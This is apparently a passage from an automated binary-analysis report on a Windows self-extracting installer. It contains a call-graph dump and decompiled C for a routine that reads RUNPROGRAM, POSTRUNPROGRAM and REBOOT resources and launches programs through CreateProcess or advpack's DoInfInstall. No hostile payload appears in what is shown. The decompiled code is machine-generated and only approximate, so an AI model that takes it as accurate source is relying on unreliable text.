2875->2878 2879 e5a6e memset 2876->2879 2880 e5ab5 SetCurrentDirectoryA 2876->2880 2881 e59d1 2877->2881 2882 e5be3 2878->2882 2883 e6285 GetLastError 2879->2883 2889 e5acc 2880->2889 2886 e6ce0 4 API calls 2881->2886 2884 e44b9 20 API calls 2882->2884 2885 e5a89 GetLastError FormatMessageA 2883->2885 2887 e5bf5 SetCurrentDirectoryA 2884->2887 2885->2882 2888 e5c11 2886->2888 2887->2881 2888->2698 2890 e5b0a 2889->2890 2892 e5b20 2889->2892 2891 e44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 e268b 2892->2917 2896 e53bf 2894->2896 2895 e171e _vsnprintf 2895->2896 2896->2895 2897 e658a CharPrevA 2896->2897 2901 e5415 GetTempFileNameA 2896->2901 2898 e53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 e544f CreateDirectoryA 2898->2899 2900 e543a 2899->2900 2899->2901 2903 e6ce0 4 API calls 2900->2903 2901->2900 2902 e5429 DeleteFileA CreateDirectoryA 2901->2902 2902->2900 2904 e5449 2903->2904 2904->2841 2906 e58d8 2905->2906 2906->2906 2907 e58df LocalAlloc 2906->2907 2908 e5919 2907->2908 2909 e58f3 2907->2909 2912 e658a CharPrevA 2908->2912 2910 e44b9 20 API calls 2909->2910 2915 e5906 2910->2915 2911 e6285 GetLastError 2916 e5534 2911->2916 2913 e5931 CreateFileA LocalFree 2912->2913 2914 e595b CloseHandle GetFileAttributesA 2913->2914 2913->2915 2914->2915 2915->2911 2915->2916 2916->2843 2916->2844 2918 e26b9 2917->2918 2919 e26e5 2917->2919 2920 e171e _vsnprintf 2918->2920 2921 e271f 2919->2921 2922 e26ea 2919->2922 2924 e26cc 2920->2924 2926 e171e _vsnprintf 2921->2926 2932 e26e3 2921->2932 2923 e171e _vsnprintf 2922->2923 2925 e26fd 2923->2925 2928 e44b9 20 API calls 2924->2928 2929 e44b9 20 API calls 2925->2929 2930 e2735 2926->2930 2927 e6ce0 4 API calls 2931 e276d 2927->2931 2928->2932 2929->2932 2933 e44b9 20 API calls 2930->2933 2931->2881 2932->2927 2933->2932 2935 e468f 7 API calls 2934->2935 2936 e4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 e5020 2936->2937 2938 e515f 2936->2938 2939 e5029 GetDlgItem 
ShowWindow GetDlgItem ShowWindow 2937->2939 2940 e5057 2937->2940 2938->2737 2939->2940 2953 e4efd 2940->2953 2943 e5060 2944 e44b9 20 API calls 2943->2944 2948 e5075 2944->2948 2945 e44b9 20 API calls 2945->2948 2946 e511d 2949 e513a 2946->2949 2951 e44b9 20 API calls 2946->2951 2947 e5110 FreeResource 2947->2946 2948->2946 2948->2947 2949->2938 2952 e514c SendMessageA 2949->2952 2950 e507c 2950->2945 2950->2948 2951->2949 2952->2938 2954 e4f4a 2953->2954 2955 e4980 25 API calls 2954->2955 2960 e4fa1 2954->2960 2958 e4f67 2955->2958 2956 e6ce0 4 API calls 2957 e4fc6 2956->2957 2957->2943 2957->2950 2959 e4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 e255b 2961->2962 2963 e2510 2961->2963 2965 e6ce0 4 API calls 2962->2965 2964 e658a CharPrevA 2963->2964 2966 e2522 WritePrivateProfileStringA _lopen 2964->2966 2967 e2569 2965->2967 2966->2962 2968 e2548 _llseek _lclose 2966->2968 2967->2747 2968->2962 2970 e1b25 2969->2970 3074 e1a84 2970->3074 2972 e1b57 2973 e658a CharPrevA 2972->2973 2975 e1b8c 2972->2975 2973->2975 2974 e66c8 2 API calls 2976 e1bd1 2974->2976 2975->2974 2977 e1bd9 CompareStringA 2976->2977 2978 e1d73 2976->2978 2977->2978 2979 e1bf7 GetFileAttributesA 2977->2979 2980 e66c8 2 API calls 2978->2980 2981 e1c0d 2979->2981 2982 e1d53 2979->2982 2983 e1d7d 2980->2983 2981->2982 2989 e1a84 2 API calls 2981->2989 2984 e1d64 2982->2984 2985 e1df8 LocalAlloc 2983->2985 2986 e1d81 CompareStringA 2983->2986 2987 e44b9 20 API calls 2984->2987 2985->2984 2988 e1e0b GetFileAttributesA 2985->2988 2986->2985 2995 e1d9b 2986->2995 3002 e1d6c 2987->3002 2990 e1e1d 2988->2990 2991 e1e45 2988->2991 2992 e1c31 2989->2992 2990->2991 3080 e2aac 2991->3080 2993 e1c50 LocalAlloc 2992->2993 2998 e1a84 2 API calls 2992->2998 2993->2984 3001 e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->3001 2994 e6ce0 4 API calls 2997 e1ea1 2994->2997 2995->2995 2999 e1dbe LocalAlloc 2995->2999 2997->2761 2998->2993 2999->2984 3004 e1de1 
2999->3004 3003 e1cf8 3001->3003 3008 e1cc2 3001->3008 3002->2994 3005 e1d09 GetShortPathNameA 3003->3005 3006 e1d23 3003->3006 3007 e171e _vsnprintf 3004->3007 3005->3006 3009 e171e _vsnprintf 3006->3009 3007->3008 3008->3002 3009->3008 3011 e209a 3010->3011 3012 e2256 3010->3012 3014 e171e _vsnprintf 3011->3014 3017 e20dc 3011->3017 3013 e6ce0 4 API calls 3012->3013 3015 e2263 3013->3015 3016 e20af RegQueryValueExA 3014->3016 3015->2761 3016->3011 3016->3017 3018 e20fb GetSystemDirectoryA 3017->3018 3019 e20e4 RegCloseKey 3017->3019 3020 e658a CharPrevA 3018->3020 3019->3012 3021 e211b LoadLibraryA 3020->3021 3022 e212e GetProcAddress FreeLibrary 3021->3022 3023 e2179 GetModuleFileNameA 3021->3023 3022->3023 3025 e214e GetSystemDirectoryA 3022->3025 3024 e21de RegCloseKey 3023->3024 3028 e2177 3023->3028 3024->3012 3026 e2165 3025->3026 3025->3028 3027 e658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 e21b7 LocalAlloc 3028->3029 3030 e21ec 3029->3030 3031 e21cd 3029->3031 3033 e171e _vsnprintf 3030->3033 3032 e44b9 20 API calls 3031->3032 3032->3024 3034 e2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 e4016 CreateProcessA 3036->3037 3048 e4106 3036->3048 3038 e40c4 3037->3038 3039 e4041 WaitForSingleObject GetExitCodeProcess 3037->3039 3042 e6285 GetLastError 3038->3042 3044 e4070 3039->3044 3040 e6ce0 4 API calls 3041 e4117 3040->3041 3041->2761 3043 e40c9 GetLastError FormatMessageA 3042->3043 3046 e44b9 20 API calls 3043->3046 3107 e411b 3044->3107 3046->3048 3047 e4096 CloseHandle CloseHandle 3047->3048 3049 e40ba 3047->3049 3048->3040 3049->3048 3051 e64c2 3050->3051 3052 e658a CharPrevA 3051->3052 3053 e64d8 GetFileAttributesA 3052->3053 3054 e64ea 3053->3054 3055 e6501 LoadLibraryA 3053->3055 3054->3055 3056 e64ee LoadLibraryExA 3054->3056 3057 e6508 3055->3057 3056->3057 3058 e6ce0 4 API calls 3057->3058 3059 e6513 3058->3059 3059->2785 3061 e2289 RegOpenKeyExA 3060->3061 3062 e2381 3060->3062 3061->3062 3063 e22b1 
RegQueryValueExA 3061->3063 3064 e6ce0 4 API calls 3062->3064 3065 e22e6 memset GetSystemDirectoryA 3063->3065 3066 e2374 RegCloseKey 3063->3066 3067 e238c 3064->3067 3068 e230f 3065->3068 3069 e2321 3065->3069 3066->3062 3067->2757 3070 e658a CharPrevA 3068->3070 3071 e171e _vsnprintf 3069->3071 3070->3069 3072 e233f RegSetValueExA 3071->3072 3072->3066 3075 e1a9a 3074->3075 3077 e1aba 3075->3077 3079 e1aaf 3075->3079 3093 e667f 3075->3093 3077->2972 3078 e667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 e2be6 3080->3081 3082 e2ad4 GetModuleFileNameA 3080->3082 3083 e6ce0 4 API calls 3081->3083 3092 e2b02 3082->3092 3085 e2bf5 3083->3085 3084 e2af1 IsDBCSLeadByte 3084->3092 3085->3002 3086 e2bca CharNextA 3088 e2bd3 CharNextA 3086->3088 3087 e2b11 CharNextA CharUpperA 3089 e2b8d CharUpperA 3087->3089 3087->3092 3088->3092 3089->3092 3091 e2b43 CharPrevA 3091->3092 3092->3081 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 e65e8 3092->3098 3094 e6689 3093->3094 3095 e66a5 3094->3095 3096 e6648 IsDBCSLeadByte 3094->3096 3097 e6697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 e65f4 3098->3099 3099->3099 3100 e65fb CharPrevA 3099->3100 3101 e6611 CharPrevA 3100->3101 3102 e660b 3101->3102 3104 e661e 3101->3104 3102->3101 3102->3104 3103 e663d 3103->3092 3104->3103 3105 e6627 CharPrevA 3104->3105 3106 e6634 CharNextA 3104->3106 3105->3103 3105->3106 3106->3103 3108 e4132 3107->3108 3110 e412a 3107->3110 3111 e1ea7 3108->3111 3110->3047 3112 e1eba 3111->3112 3113 e1ed3 3111->3113 3114 e256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 e2026 3115->3116 3117 e1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 e200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3228 e6a20 __getmainargs 3229 e19e0 3230 e1a24 GetDesktopWindow 3229->3230 3231 e1a03 3229->3231 3233 e43d0 11 API calls 3230->3233 3232 e1a20 3231->3232 3234 e1a16 EndDialog 3231->3234 3236 e6ce0 4 API calls 3232->3236 3235 e1a33 LoadStringA SetDlgItemTextA 
MessageBeep 3233->3235 3234->3232 3235->3232 3237 e1a7e 3236->3237 3238 e7270 _except_handler4_common 3239 e69b0 3240 e69b5 3239->3240 3248 e6fbe GetModuleHandleW 3240->3248 3242 e69c1 __set_app_type __p__fmode __p__commode 3243 e69f9 3242->3243 3244 e6a0e 3243->3244 3245 e6a02 __setusermatherr 3243->3245 3250 e71ef _controlfp 3244->3250 3245->3244 3247 e6a13 3249 e6fcf 3248->3249 3249->3242 3250->3247 3251 e34f0 3252 e3504 3251->3252 3253 e35b8 3251->3253 3252->3253 3254 e35be GetDesktopWindow 3252->3254 3255 e351b 3252->3255 3256 e3526 3253->3256 3260 e3671 EndDialog 3253->3260 3257 e43d0 11 API calls 3254->3257 3258 e354f 3255->3258 3259 e351f 3255->3259 3261 e35d6 3257->3261 3258->3256 3263 e3559 ResetEvent 3258->3263 3259->3256 3262 e352d TerminateThread EndDialog 3259->3262 3260->3256 3264 e361d SetWindowTextA CreateThread 3261->3264 3265 e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3262->3256 3266 e44b9 20 API calls 3263->3266 3264->3256 3267 e3646 3264->3267 3265->3264 3268 e3581 3266->3268 3269 e44b9 20 API calls 3267->3269 3270 e359b SetEvent 3268->3270 3272 e358a SetEvent 3268->3272 3269->3253 3271 e3680 4 API calls 3270->3271 3271->3253 3272->3256 3273 e6ef0 3274 e6f2d 3273->3274 3276 e6f02 3273->3276 3275 e6f27 ?terminate@ 3275->3274 3276->3274 3276->3275

Callgraph (legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available)

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E3BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                      				_t69 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                      				 *0xe9124 =  *0xe9124 & 0;
                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                      				_t165 =  *0xe8a28 - _t153; // 0x0
                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                      						if( *0xe8c42 != 0) {
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                      						_t115 = E000E468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                      							E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      							 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                      									if(_v396 == _t137) {
                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                      								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E000E1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E000E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E000E3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xe8580;
													if( *0xe8580 != 0) {
														E000E2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xe8180;
											if( *0xe8180 == 0) {
												_t146 = 0x4c7;
												E000E44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xe9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xe9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E000E6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E000E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xe9124 = E000E6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E000E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xe8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xe9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xe8a38 & 0x0000ffff;
											_v380 = 0xe9154;
											_v376 = _t151;
											_v372 = 0xe91e4;
											_v360 = _t97;
											if( *0xe8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xe9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xe8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xe9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xea288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xe9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xe9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xe8a20;
										if( *0xe8a20 == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      										E000E202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E000E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe8c42;
                                                                                                                                                                                                      									if( *0xe8c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0xe8a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E000E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E000E468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                      						E000E1781( &_v276, 0x104, _t130, 0xe8c42);
                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                      				_t125 = E000E468F(_t130, 0xe9a2c, 4);
                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























































                                                                                                                                                                                                      0x000e3de8
                                                                                                                                                                                                      0x000e3f0b
                                                                                                                                                                                                      0x000e3f0b
                                                                                                                                                                                                      0x000e3f0f
                                                                                                                                                                                                      0x000e3f13
                                                                                                                                                                                                      0x000e3f15
                                                                                                                                                                                                      0x000e3f1a
                                                                                                                                                                                                      0x000e3f1c
                                                                                                                                                                                                      0x000e3f46
                                                                                                                                                                                                      0x000e3f47
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f47
                                                                                                                                                                                                      0x000e3f1e
                                                                                                                                                                                                      0x000e3f1f
                                                                                                                                                                                                      0x000e3f25
                                                                                                                                                                                                      0x000e3f26
                                                                                                                                                                                                      0x000e3f2a
                                                                                                                                                                                                      0x000e3f2d
                                                                                                                                                                                                      0x000e3fd9
                                                                                                                                                                                                      0x000e3fd9
                                                                                                                                                                                                      0x000e3fda
                                                                                                                                                                                                      0x000e3fda
                                                                                                                                                                                                      0x000e3fe1
                                                                                                                                                                                                      0x000e3fe3
                                                                                                                                                                                                      0x000e3fe3
                                                                                                                                                                                                      0x000e3fe8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3fe8
                                                                                                                                                                                                      0x000e3f33
                                                                                                                                                                                                      0x000e3f37
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f37
                                                                                                                                                                                                      0x000e3dee
                                                                                                                                                                                                      0x000e3dee
                                                                                                                                                                                                      0x000e3df5
                                                                                                                                                                                                      0x000e3fad
                                                                                                                                                                                                      0x000e3fb9
                                                                                                                                                                                                      0x000e3fc2
                                                                                                                                                                                                      0x000e3fc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3fc8
                                                                                                                                                                                                      0x000e3dfb
                                                                                                                                                                                                      0x000e3dfd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3e03
                                                                                                                                                                                                      0x000e3e0a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3e15
                                                                                                                                                                                                      0x000e3e17
                                                                                                                                                                                                      0x000e3e19
                                                                                                                                                                                                      0x000e3f94
                                                                                                                                                                                                      0x000e3fa4
                                                                                                                                                                                                      0x000e3f7c
                                                                                                                                                                                                      0x000e3f80
                                                                                                                                                                                                      0x000e3f8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f8b
                                                                                                                                                                                                      0x000e3e2c
                                                                                                                                                                                                      0x000e3e30
                                                                                                                                                                                                      0x000e3e34
                                                                                                                                                                                                      0x000e3e36
                                                                                                                                                                                                      0x000e3f69
                                                                                                                                                                                                      0x000e3f6e
                                                                                                                                                                                                      0x000e3f70
                                                                                                                                                                                                      0x000e3f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f76
                                                                                                                                                                                                      0x000e3e3c
                                                                                                                                                                                                      0x000e3e43
                                                                                                                                                                                                      0x000e3e47
                                                                                                                                                                                                      0x000e3e52
                                                                                                                                                                                                      0x000e3e56
                                                                                                                                                                                                      0x000e3e5c
                                                                                                                                                                                                      0x000e3e61
                                                                                                                                                                                                      0x000e3e68
                                                                                                                                                                                                      0x000e3e70
                                                                                                                                                                                                      0x000e3e74
                                                                                                                                                                                                      0x000e3e7c
                                                                                                                                                                                                      0x000e3e80
                                                                                                                                                                                                      0x000e3e82
                                                                                                                                                                                                      0x000e3e82
                                                                                                                                                                                                      0x000e3e87
                                                                                                                                                                                                      0x000e3e87
                                                                                                                                                                                                      0x000e3e8b
                                                                                                                                                                                                      0x000e3e91
                                                                                                                                                                                                      0x000e3e94
                                                                                                                                                                                                      0x000e3e96
                                                                                                                                                                                                      0x000e3e96
                                                                                                                                                                                                      0x000e3e9b
                                                                                                                                                                                                      0x000e3e9b
                                                                                                                                                                                                      0x000e3e9f
                                                                                                                                                                                                      0x000e3ea2
                                                                                                                                                                                                      0x000e3ea4
                                                                                                                                                                                                      0x000e3ea4
                                                                                                                                                                                                      0x000e3ea9
                                                                                                                                                                                                      0x000e3ea9
                                                                                                                                                                                                      0x000e3ead
                                                                                                                                                                                                      0x000e3eb3
                                                                                                                                                                                                      0x000e3eb6
                                                                                                                                                                                                      0x000e3eb8
                                                                                                                                                                                                      0x000e3eb8
                                                                                                                                                                                                      0x000e3ebd
                                                                                                                                                                                                      0x000e3ebd
                                                                                                                                                                                                      0x000e3ec1
                                                                                                                                                                                                      0x000e3ec3
                                                                                                                                                                                                      0x000e3ec5
                                                                                                                                                                                                      0x000e3ec5
                                                                                                                                                                                                      0x000e3eca
                                                                                                                                                                                                      0x000e3eca
                                                                                                                                                                                                      0x000e3ece
                                                                                                                                                                                                      0x000e3ed5
                                                                                                                                                                                                      0x000e3ed9
                                                                                                                                                                                                      0x000e3ee0
                                                                                                                                                                                                      0x000e3ee6
                                                                                                                                                                                                      0x000e3eea
                                                                                                                                                                                                      0x000e3eec
                                                                                                                                                                                                      0x000e3eee
                                                                                                                                                                                                      0x000e3ef3
                                                                                                                                                                                                      0x000e3ef3
                                                                                                                                                                                                      0x000e3ef5
                                                                                                                                                                                                      0x000e3efa
                                                                                                                                                                                                      0x000e3efb
                                                                                                                                                                                                      0x000e3efd
                                                                                                                                                                                                      0x000e3f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3eff
                                                                                                                                                                                                      0x000e3eff
                                                                                                                                                                                                      0x000e3f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f05
                                                                                                                                                                                                      0x000e3efd
                                                                                                                                                                                                      0x000e3dc7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E3C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 000E3CDC
